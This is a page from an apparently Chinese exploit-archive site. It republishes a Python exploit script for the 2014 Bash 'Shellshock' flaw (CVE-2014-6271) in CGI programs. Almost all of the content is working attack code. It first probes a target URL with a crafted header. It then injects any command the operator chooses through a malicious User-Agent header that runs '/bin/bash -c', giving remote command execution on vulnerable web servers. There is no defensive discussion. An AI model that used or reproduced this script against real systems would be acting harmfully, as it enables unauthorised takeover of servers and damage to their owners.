首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gnu Bash 4.3 CGI Scan Remote Command Injection
来源:http://www.homelab.it 作者:Viviani 发布时间:2014-09-28  
#!/usr/bin/env python

# http connection
import urllib2
# Args management
import optparse
# Error managemen
import sys

banner = """
      _______                 _______             __
     |   _   .-----.--.--.   |   _   .---.-.-----|  |--.
     |.  |___|     |  |  |   |.  1   |  _  |__ --|     |
     |.  |   |__|__|_____|   |.  _   |___._|_____|__|__|
     |:  1   |               |:  1    \
     |::.. . |               |::.. .  /
     `-------'               `-------'
      ___ ___   _______     _______ _______ ___
     |   Y   | |   _   |   |   _   |   _   |   |
     |   |   |_|___|   |   |.  l   |.  1___|.  |
     |____   |___(__   |   |.  _   |.  |___|.  |
         |:  | |:  1   |   |:  |   |:  1   |:  |
         |::.| |::.. . |   |::.|:. |::.. . |::.|
         `---' `-------'   `--- ---`-------`---'

                              Gnu B4sh <= 4.3 Cg1 Sc4n + r3m0t3 C0mm4nd Inj3ct10n

          ==========================================
          - Release date: 2014-09-25
          - Discovered by: Stephane Chazelas
          - CVE: 2014-6271
          ===========================================

                        Written by:

                      Claudio Viviani

                   http://www.homelab.it

                      info@homelab.it
                  homelabit@protonmail.ch

             https://www.facebook.com/homelabit
                https://twitter.com/homelabit
             https://plus.google.com/+HomelabIt1/
   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

def connectionScan(url):
    print '[+] Checking for vulnerability...'
    try:
        headers = {"VULN" : "() { :;}; echo 'H0m3l4b1t: YES'"}
        response = urllib2.Request(url, None, headers)
        content = urllib2.urlopen(response)
        if 'H0m3l4b1t' in  content.info():
            print '[!] VULNERABLE: '+url
        else:
            print '[X] NOT Vulnerable'
    except urllib2.HTTPError, e:
        print e.info()
        if e.code == 400:
            print '[X] Page not found'
        else:
            print '[X] HTTP Error'
    except urllib2.URLError:
        print '[X] Connection Error'

def connectionInje(url,cmd):
    try:
        headers = { 'User-Agent' : '() { :;}; /bin/bash -c "'+cmd+'"' }
        response = urllib2.Request(url, None, headers)
        content = urllib2.urlopen(response).read()
        print '[!] '+cmd+' command sent!'
    except urllib2.HTTPError, e:
        if e.code == 500:
            print '[!] '+cmd+' command sent!!!'
        else:
            print '[!] command not sent :('
    except urllib2.URLError:
        print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog [-s] -t http://localhost/cgi-bin/test -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-s', '--scan', default=False, action="store_true",
                  help="Scan Only",
                  )
options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
elif options.target and not options.cmd and not options.scan:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

url = checkurl(options.target)
cmd = options.cmd
if options.scan:
    print '[+] Scan Only Mode'
    connectionScan(url)
else:
    print '[+] Remote Command Innection Mode'
    connectionScan(url)
    connectionInje(url,cmd)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DHCP Client Bash Environment V
·Gnu Bash 4.3 CGI REFERER Comma
·Apache mod_cgi Bash Environmen
·Dhclient Bash Environment Vari
·bash代码注入的安全漏洞
·Perl 5.20.1 Deep Recursion Sta
·Microsoft Exchange IIS HTTP In
·Mac OS X VMWare Fusion Root Pr
·Internet Explorer 8 - Fixed Co
·Nucom ADSL ADSLR5000UN ISP Cre
·Adobe Flash 14.0.0.145 copyPix
·GNU bash Environment Variable
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved